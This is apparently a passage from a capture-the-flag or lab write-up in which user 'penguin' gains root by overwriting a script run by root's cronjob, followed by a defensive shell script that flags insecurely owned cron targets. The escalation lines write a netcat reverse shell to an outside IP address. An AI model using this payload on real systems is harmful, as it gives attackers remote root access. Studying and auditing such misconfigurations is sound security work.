Overwriting Root Cronjob


The root cronjob identified on the glasgowsmile host executes a Bash script owned by the current user, penguin. Because penguin can overwrite that script, its contents run as root the next time the job fires, which makes privilege escalation achievable.

penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ echo -e '#!/bin/sh\nnc 192.168.45.182 1234 -c bash' > /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old 
penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ cat /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old 
#!/bin/sh
nc 192.168.45.182 1234 -c bash

The /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old file is overwritten with a reverse shell command.
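
A defender-side check for the misconfiguration used above, as an added example that is not part of the original write-up: it reads a crontab file and prints every absolute path on a job line that is owned by an account other than the trusted one (root by default), is group/other-writable, or sits in such a directory. The function names and the approach of scanning every path token on the line are assumptions of this example.

```shell
#!/bin/sh
# Added example (not from the original write-up): flag crontab targets that an
# account other than the trusted one could modify.
# Usage: audit_cron_targets CRONTAB_FILE [TRUSTED_UID]   (default uid 0 = root)

# Succeeds (status 0) when the path in $1 is owned by a uid other than $2 or is
# writable by group/others. Relies on `stat -c` (GNU coreutils or busybox).
is_risky() {
    info=$(stat -c '%u %a' "$1" 2>/dev/null) || return 1
    owner=${info% *}
    mode=${info#* }
    [ "$owner" != "$2" ] && return 0
    [ $(( 0$mode & 022 )) -ne 0 ] && return 0
    return 1
}

# The body runs in a subshell so `set -f` (no globbing of the "*" time fields)
# and the loop variables do not leak into the caller.
audit_cron_targets() (
    trusted=${2:-0}
    set -f
    while IFS= read -r line; do
        case $line in ''|'#'*) continue ;; esac      # skip blanks and comments
        for tok in $line; do
            case $tok in /*) ;; *) continue ;; esac  # absolute paths only
            [ -e "$tok" ] || continue
            # A writable parent directory lets the file be replaced outright.
            if is_risky "$tok" "$trusted" || is_risky "$(dirname "$tok")" "$trusted"; then
                printf '%s\n' "$tok"
            fi
        done
    done < "$1"
)

# Run directly: sh audit.sh /etc/crontab
if [ $# -gt 0 ]; then audit_cron_targets "$@"; fi
```

Any path it prints for a root-run job should be moved to a root-owned directory and set to root ownership with no group or other write bit.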

System-level compromise